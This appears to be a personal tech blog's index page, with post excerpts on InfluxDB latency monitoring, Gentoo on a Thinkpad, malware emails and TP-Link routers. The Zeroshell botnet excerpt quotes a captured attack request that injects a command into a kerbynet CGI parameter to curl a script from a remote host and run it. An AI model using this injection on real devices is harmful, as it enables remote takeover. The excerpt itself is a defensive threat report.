Monitoring WAN latency with InfluxDB

7 Dec, 2020 - 2 minutes
This is a simple, ‘quick and dirty’ way to measure network latency over long periods of time. The only ‘complicated’ part is setting up InfluxDB, but I imagine that many folks already have it set up. To get started, check the official documentation. Network latency will be measured with the good old ping command, then formatted with generic Unix tools. Then, statistics are stored using the influxdb write endpoint using the line protocol format.

The Zeroshell botnet returns

2 Dec, 2020 - 3 minutes
Back in August, I discovered novel cyberattacks targeting network infrastructure. Now, four months later, another botnet is targeting these devices again. My original report is here: https://nbailey.ca/post/zeroshell-botnet New attack The previous version of the zeroshell malware would leave logs with this pattern: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F99.99.99.99%2Fzero;sh%20zero;%22 Decoding the URL strings, we get: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://99.99.99.99/zero;sh zero;" This string causes the vulnerable system to download and execute a shell script named zero. However, the new attack takes on a different form:

Installing Gentoo on a vintage Thinkpad T60

12 Nov, 2020 - 3 minutes
I installed Gentoo Linux on my vintage Thinkpad. This particular device has a rather colourful history. In mid 2015 I recovered it from an e-waste pile at my workplace and brought it back to life. In the years since, it’s been a playground of sorts. In five years it’s had four editions of Windows, three versions of BSD, exotic operating systems like Redox and ReactOS, and of course dozens of different Linux distributions.

Malware emails 2: Russian boogaloo

23 Oct, 2020 - 5 minutes
Today I got yet another malware email. They just won’t leave me alone. I suspect it has to do with the upcoming US election, based on all the CISA alerts I’ve seen over the last couple days. However, after going down the rabbit hole with this malware I do suspect that whatever is behind it is more sophisticated than a simple ransomware gang. I won’t speculate too much, but because of its highly distributed and evasive design it could be the work of a larger enterprise.

TP-Link Device Weirdness

22 Oct, 2020 - 3 minutes
I recently started using a TP-Link C7 router to host a guest network at my house. I typically avoid consumer/prosumer gear for my network, sticking to either whitebox (homemade) or older enterprise gear. Alas, the price was right ($0). Every time I do encounter one of these devices I always manage to find something fun and interesting to poke… Bad SSH server First red flag was the sshd server running on this router.